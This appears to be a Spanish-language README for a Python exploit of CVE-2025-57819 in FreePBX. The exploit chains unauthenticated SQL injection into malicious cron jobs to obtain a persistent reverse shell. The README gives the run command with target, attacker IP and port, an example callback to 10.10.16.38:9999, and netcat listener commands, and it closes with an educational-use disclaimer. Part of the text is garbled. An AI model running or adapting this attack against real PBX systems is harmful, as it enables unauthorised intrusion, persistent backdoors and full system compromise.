
Exploit de Python para CVE-2025-57819 dirigido a FreePBX mediante inyección SQL no autenticada para lograr la ejecución remota de código con shell inverso automático y persistencia basada en cron.
< 15.0.66, < 16.0.89 y < 17.0.3Este script explota CVE-2025-57819 en un módulo endpoint vulnerable de FreePBX. La vulnerabilidad permite inyección SQL, que se aprovecha para inyectar trabajos cron maliciosos.
No hay pasos adicionales necesarios, a diferencia de otros exploits públicos que requieren interactuar con el objetivo a través de una webshell subida. Es un enfoque directo que te proporciona acceso directo a una reverse shell.
La ejecución remota de código se logra mediante inyección SQL y manipulación de trabajos cron. Una explotación exitosa resulta en una reverse shell en el sistema objetivo. Dependiendo de la configuración, esto puede llevar al compromiso total del sistema.
* * * * *)base64 se corrompen cuando los caracteres + se interpretan como espacios.Ejecuta el exploit proporcionando el objetivo y la configuración del listener:
python3 cve-2025-57819.py <target> <lhost> <lport>
<target>: Hostname o dirección IP del objetivo (instancia FreePBX vulnerable)<lhost>: Dirección IP del atacante para el callback de la reverse shell<lport>: Puerto en escucha para la conexión entrantepython3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
Inicia un listener antes de ejecutar el exploit:
nc -lvnp <port>
nc -nlvp 9999
Esta herramienta está destinada únicamente a fines educativos y pruebas de seguridad autorizadas. El uso no autorizado contra sistemas sin permiso explícito es ilegal. El autor no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta.
Its1Zero - [email protected]